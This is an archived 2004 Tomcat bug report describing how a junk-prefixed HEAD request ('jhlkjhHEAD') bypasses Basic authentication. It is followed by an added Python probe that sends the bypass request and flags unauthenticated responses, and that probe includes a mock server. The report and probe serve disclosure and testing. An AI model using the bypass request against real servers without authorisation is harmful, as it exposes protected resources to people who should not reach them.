tomcat-dev mailing list archives

From bugzi...@apache.org
Subject DO NOT REPLY [Bug 28778] New: - Malformed HEAD method can bypass (basic) authentication.
Date Wed, 05 May 2004 12:21:23 GMT
DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG 
RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT
<http://issues.apache.org/bugzilla/show_bug.cgi?id=28778>.
ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND 
INSERTED IN THE BUG DATABASE.

http://issues.apache.org/bugzilla/show_bug.cgi?id=28778

Malformed HEAD method can bypass (basic) authentication.

           Summary: Malformed HEAD method can bypass (basic) authentication.
           Product: Tomcat 4
           Version: 4.1.30
          Platform: PC
        OS/Version: Windows XP
            Status: NEW
          Severity: Major
          Priority: Other
         Component: Unknown
        AssignedTo: tomcat-dev@jakarta.apache.org
        ReportedBy: gates_na@yahoo.com


If the HEAD word is preceded by any nonspace characters it behaves as a GET
method but no authentication is requested.
Reproduce:
- Secure some resource ex. "/*" with Basic authentication
- Telnet into Tomcat like "telnet localhost 8080"
- Type correct GET request "GET / HTTP/1.0"; you should receive "401 Unauthorized"
- Type correct HEAD request "HEAD / HTTP/1.0"; you should receive "401 Unauthorized" but you get "200 OK" without content, which is already a violation of RFC 2068 because it says: "The metainformation contained in the HTTP headers in response to a HEAD request SHOULD be identical to the information sent in response to a GET request."
- Type incorrect HEAD request "jhlkjhHEAD / HTTP/1.0"; you should receive the same as above but you get what you would by sending GET as if there was no need for authentication.

I think this is a serious security problem. One could modify a browser to 
bypass any authentication.
I have tried this on a context other than the defaults.
I have also used my own users and role.
I didn’t try it with other authentications.

---------------------------------------------------------------------
To unsubscribe, e-mail: tomcat-dev-unsubscribe@jakarta.apache.org
For additional commands, e-mail: tomcat-dev-help@jakarta.apache.org
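The reproduction steps in the report, scripted as a probe. This is an added example, not part of the bug report and not Tomcat code: it sends the three raw HTTP/1.0 request lines from the report over a socket, parses each status line, and flags any variant whose response disagrees with the 401 challenge the well-formed GET receives on a protected resource. The names `probe`, `assess` and `start_mock_server` are the example's own. When run without a host and port it starts a stand-in server that only replays the responses the report describes (401 for GET, empty 200 for HEAD, 200 with a body for the junk-prefixed HEAD), so the script can be exercised offline; against a real server pass `host port` on the command line.

```python
import socket
import socketserver
import sys
import threading

# Raw HTTP/1.0 requests from the report: well-formed GET, well-formed HEAD,
# and the malformed variant with junk glued in front of the method token.
def build_requests(path="/"):
    return {
        "GET": f"GET {path} HTTP/1.0\r\n\r\n",
        "HEAD": f"HEAD {path} HTTP/1.0\r\n\r\n",
        "junkHEAD": f"jhlkjhHEAD {path} HTTP/1.0\r\n\r\n",
    }

def parse_response(raw):
    """Split a raw HTTP response into (status code, lower-cased headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    parts = lines[0].decode("latin-1").split(" ", 2)
    code = int(parts[1]) if len(parts) >= 2 and parts[1].isdigit() else None
    headers = {}
    for line in lines[1:]:
        name, _, value = line.decode("latin-1").partition(":")
        headers[name.strip().lower()] = value.strip()
    return code, headers, body

def send_raw(host, port, request, timeout=5.0):
    """Send one raw request on a fresh connection and read until the server closes (HTTP/1.0)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request.encode("latin-1"))
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)

def probe(host, port, path="/"):
    """Send all three variants and keep what the bypass check needs."""
    results = {}
    for name, req in build_requests(path).items():
        code, headers, body = parse_response(send_raw(host, port, req))
        results[name] = {"status": code, "body_len": len(body),
                         "challenge": headers.get("www-authenticate")}
    return results

def assess(results):
    """Compare HEAD and junkHEAD against the GET baseline of a protected resource."""
    findings = []
    base = results["GET"]["status"]
    if base != 401:
        return [f"GET returned {base}, not 401: resource may not be protected"]
    for name in ("HEAD", "junkHEAD"):
        r = results[name]
        if r["status"] != base or r["challenge"] is None:
            findings.append(f"{name}: {r['status']} without a challenge where GET got 401")
        if r["body_len"] > 0:
            findings.append(f"{name}: {r['body_len']} body bytes returned without authentication")
    return findings

# Stand-in that replays only the behaviour the report describes (constructed
# responses; this is not Tomcat), so the probe can be run offline.
class _ReportedBehaviour(socketserver.BaseRequestHandler):
    def handle(self):
        data = b""
        while b"\r\n\r\n" not in data:
            chunk = self.request.recv(4096)
            if not chunk:
                break
            data += chunk
        method = data.split(b" ", 1)[0]
        if method == b"GET":
            resp = (b'HTTP/1.0 401 Unauthorized\r\nWWW-Authenticate: Basic realm="x"\r\n'
                    b"Content-Length: 0\r\n\r\n")
        elif method == b"HEAD":
            resp = b"HTTP/1.0 200 OK\r\nContent-Type: text/html\r\n\r\n"
        else:
            body = b"<html>secret</html>"
            resp = (b"HTTP/1.0 200 OK\r\nContent-Type: text/html\r\nContent-Length: "
                    + str(len(body)).encode() + b"\r\n\r\n" + body)
        self.request.sendall(resp)

def start_mock_server():
    srv = socketserver.ThreadingTCPServer(("127.0.0.1", 0), _ReportedBehaviour)
    srv.daemon_threads = True
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]

if __name__ == "__main__":
    if len(sys.argv) == 3:
        host, port = sys.argv[1], int(sys.argv[2])
    else:
        _, port = start_mock_server()
        host = "127.0.0.1"
    for line in assess(probe(host, port)) or ["no discrepancy found"]:
        print(line)
```

The check deliberately treats a 200 on HEAD with no WWW-Authenticate header as a finding in its own right, separate from the body leak: the header mismatch is the RFC 2068 point the report makes, while a non-empty body on the junk-prefixed request is the actual bypass.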